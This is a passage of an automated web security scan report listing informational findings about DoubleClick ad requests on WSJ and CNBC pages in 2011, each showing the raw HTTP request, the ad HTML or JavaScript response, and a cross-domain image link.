<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/3/0/%2a
...[SNIP]...
x67%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3fhttp://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_hamwbb_170x67" target="_new" style="text-decoration:none"><img src="http://s0.2mdn.net/1146650/MW_BBBrokerCenterTitle_170x40.png" width="170" height="40" border="0" alt="advertisement" align="top"/><div style="font-family: Arial, Helvetica, Verdana, sans-serif;font-size: 11px;padding:0px 0px 0px 0px; solid #cfc7b7;">
...[SNIP]...

15.15. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=9119911991199119;

The response contains the following link to another domain:

http://s0.2mdn.net/1146650/MW_BBBrokerCenterBuySellHoldv2_170x40.png

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=9119911991199119; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 897
Date: Thu, 16 Jun 2011 11:24:10 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/3/0/%2a
...[SNIP]...
x67%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3fhttp://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_hamwbb_170x67" target="_new" style="text-decoration:none"><img src="http://s0.2mdn.net/1146650/MW_BBBrokerCenterBuySellHoldv2_170x40.png" width="170" height="40" border="0" alt="advertisement" align="top"/><div style="font-family: Arial, Helvetica, Verdana, sans-serif;font-size: 11px;padding:0px 0px 0px 0px; solid #cfc7b7;">
...[SNIP]...

15.16. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=3;tile=7;sz=170x67;ord=9119911991199119;

The response contains the following link to another domain:

http://s0.2mdn.net/2457383/102896_01_FreeTrades_EII_None_170x40B.gif

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=3;tile=7;sz=170x67;ord=9119911991199119; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 886
Date: Thu, 16 Jun 2011 11:24:11 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/3/0/%2a
...[SNIP]...
Bpos%3D3%3Btile%3D7%3Bsz%3D170x67%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3fhttp://ad.doubleclick.net/clk;235505112;58787601;f" target="_new" style="text-decoration:none"><img src="http://s0.2mdn.net/2457383/102896_01_FreeTrades_EII_None_170x40B.gif" width="170" height="40" border="0" alt="advertisement" align="top"/><div style="font-family: Arial, Helvetica, Verdana, sans-serif;font-size: 11px;padding:0px 0px 0px 0px; solid #cfc7b7;">
...[SNIP]...

15.17. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=3;tile=7;sz=170x67;ord=8144814481448144;

The response contains the following link to another domain:

http://s0.2mdn.net/2457383/102896_01_Research_EII_None_170x40B.gif

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=3;tile=7;sz=170x67;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 884
Date: Thu, 16 Jun 2011 11:22:20 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/3/0/%2a
...[SNIP]...
Bpos%3D3%3Btile%3D7%3Bsz%3D170x67%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3fhttp://ad.doubleclick.net/clk;235505194;58787601;p" target="_new" style="text-decoration:none"><img src="http://s0.2mdn.net/2457383/102896_01_Research_EII_None_170x40B.gif" width="170" height="40" border="0" alt="advertisement" align="top"/><div style="font-family: Arial, Helvetica, Verdana, sans-serif;font-size: 11px;padding:0px 0px 0px 0px; solid #cfc7b7;">
...[SNIP]...

15.18. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/forgotpassword

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword;mc=b2pfreezone;tile=1;sz=377x50;ord=3076307630763076;

The response contains the following link to another domain:

http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg

Request

GET /adi/interactive.wsj.com/forgotpassword;mc=b2pfreezone;tile=1;sz=377x50;ord=3076307630763076; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1192
Date: Thu, 16 Jun 2011 11:24:26 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg" width="377" height="50" border="0" usemap="#Mapfeb09_stackedheader" />
<map name="Mapfeb09_stackedheader" id="Map">
...[SNIP]...

15.19. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/front_nonsub

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=3;sz=280x61;ord=8144814481448144;

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3198123/17g_280x61.gif

Request

GET /adi/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=3;sz=280x61;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 541
Date: Thu, 16 Jun 2011 11:22:21 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/0/0/%2a/q;241458224;0-0;13;2974350
...[SNIP]...
s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=3;sz=280x61;;bsg=122689;bsg=122690;;~aopt=2/1/ff/1;~sscs=%3fhttps://buy.wsj.com/shopandbuy/order/subscribe.jsp?trackCode=aaagprmr"><img src="http://s0.2mdn.net/viewad/3198123/17g_280x61.gif" border=0 alt="Click Here"></a>
...[SNIP]...

15.20. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/front_nonsub

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=280x46;ord=8144814481448144;

The response contains the following link to another domain:

http://s0.2mdn.net/1952284/17g_280x46.gif

Request

GET /adi/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=280x46;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1294
Date: Thu, 16 Jun 2011 11:22:22 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><map name="HP_280x46">

<area shape="rect" coords="154,5,195,20" href="http://ad.doubleclick.net/cli
...[SNIP]...
</map>

<IMG SRC="http://s0.2mdn.net/1952284/17g_280x46.gif" HEIGHT="46" WIDTH="280" USEMAP="#HP_280x46" border="0">
</body>

15.21. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/front_nonsub

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=4;sz=377x140;ord=8144814481448144;

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1146650/SM_WSJBC_circoffer0211_377x140.gif

Request

GET /adi/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=4;sz=377x140;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 602
Date: Thu, 16 Jun 2011 11:22:21 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/0/0/%2a/l;215935200;3-0;0;29743509
...[SNIP]...
=8_10001;mc=b2pfreezone;tile=4;sz=377x140;;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/ConvertibleGateway?cds_mag_code=SMY&cds_page_id=85110&cds_response_key=IEBOSDAG"><img src="http://s0.2mdn.net/viewad/1146650/SM_WSJBC_circoffer0211_377x140.gif" border=0 alt="Click Here"></a>
...[SNIP]...

15.22. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/front_nonsub

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub;;biz=1080;biz=1027;biz=1053;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=4;sz=377x140;ord=9119911991199119;

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1146650/FINS_verticals_sales_377x140.jpg

Request

GET /adi/interactive.wsj.com/front_nonsub;;biz=1080;biz=1027;biz=1053;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=4;sz=377x140;ord=9119911991199119; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 573
Date: Thu, 16 Jun 2011 11:24:10 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/0/0/%2a/l;215935200;4-0;0;29743509
...[SNIP]...
027;biz=1053;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=4;sz=377x140;;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttp://sales-jobs.fins.com/?reflink=djm_bcu_sales_x140"><img src="http://s0.2mdn.net/viewad/1146650/FINS_verticals_sales_377x140.jpg" border=0 alt="Click Here"></a>
...[SNIP]...

15.23. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/front_nonsub

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub;u=%5E%5ElDlIlPlQlA;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8144814481448144;

The response contains the following link to another domain:

http://s0.2mdn.net/1952284/HP_header_control_tile.jpg

Request

GET /adi/interactive.wsj.com/front_nonsub;u=%5E%5ElDlIlPlQlA;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1419
Date: Thu, 16 Jun 2011 11:22:21 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/HP_header_control_tile.jpg" width="377" height="50" border="0" usemap="#Mapfeb09_stackedheader" />
<map name="Mapfeb09_stackedheader" id="Map">
...[SNIP]...

15.24. http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/slideshow

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow;u=%5E%5ElDlIlPlQlA;;msrc=WSJ_hp_mostpop_read;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=wsjfreezone;tile=1;sz=377x50;ord=1161116111611161;

The response contains the following link to another domain:

http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg

Request

GET /adi/interactive.wsj.com/slideshow;u=%5E%5ElDlIlPlQlA;;msrc=WSJ_hp_mostpop_read;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=wsjfreezone;tile=1;sz=377x50;ord=1161116111611161; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1482
Date: Thu, 16 Jun 2011 11:22:36 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg" width="377" height="50" border="0" usemap="#Mapfeb09_stackedheader" />
<map name="Mapfeb09_stackedheader" id="Map">
...[SNIP]...

15.25. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1452306/1-15_DeathPCVideoOPWSJ_300x250.gif

Request

GET /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247910801&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 602
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 18:11:55 GMT
Expires: Thu, 16 Jun 2011 18:11:55 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/c/b4/%2a/n;223454979;0-0;0;56063734;4307-300/250;39046206/39063963/3;;~sscs=%3fhttp://r1-ads.ace.advertising.com/clic
...[SNIP]...
%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=http%3a%2f%2fwww.fool.com/fool/free-report/15/rb-billgates-displayexternal-68077.aspx%3Faid%3D3776%26logvisit%3Dy%26source%3Derbatrbox0860010"><img src="http://s0.2mdn.net/viewad/1452306/1-15_DeathPCVideoOPWSJ_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

15.26. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000924217/cstr=1625138=_4dfa43bf,0557655566,768034%5E924217%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=1625138/optn=64?trg=;ord=0557655566?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1452306/15_iPhone5IsComing_BlackHL_728x90.gif

Request

GET /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000924217/cstr=1625138=_4dfa43bf,0557655566,768034%5E924217%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=1625138/optn=64?trg=;ord=0557655566? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308246973695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 595
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 17:56:15 GMT
Expires: Thu, 16 Jun 2011 17:56:15 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/c/b2/%2a/b;223455194;2-0;0;56063736;3454-728/90;42286727/42304514/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click
...[SNIP]...
5E924217%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=1625138/optn=64?trg=http%3a%2f%2fwww.fool.com/fool/free-report/15/rb-ultimatewireless-displayexternal-107046.aspx%3Faid%3D4062%26source%3Derbatrlbd0860006"><img src="http://s0.2mdn.net/viewad/1452306/15_iPhone5IsComing_BlackHL_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

15.27. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=14;tile=14;sz=88x31;ord=582942091860?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3003537/ET_LogoTextPO_No_88x31.gif

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=14;tile=14;sz=88x31;ord=582942091860? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 603
Date: Thu, 16 Jun 2011 11:24:48 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/0/0/%2a/r;241642268;1-0;0;65280716;21-88/31;39967610/39985397/1;;~okv=;pc=DFP242490896;;~aopt=0/ff/b7/ff;~fdr=2424908
...[SNIP]...
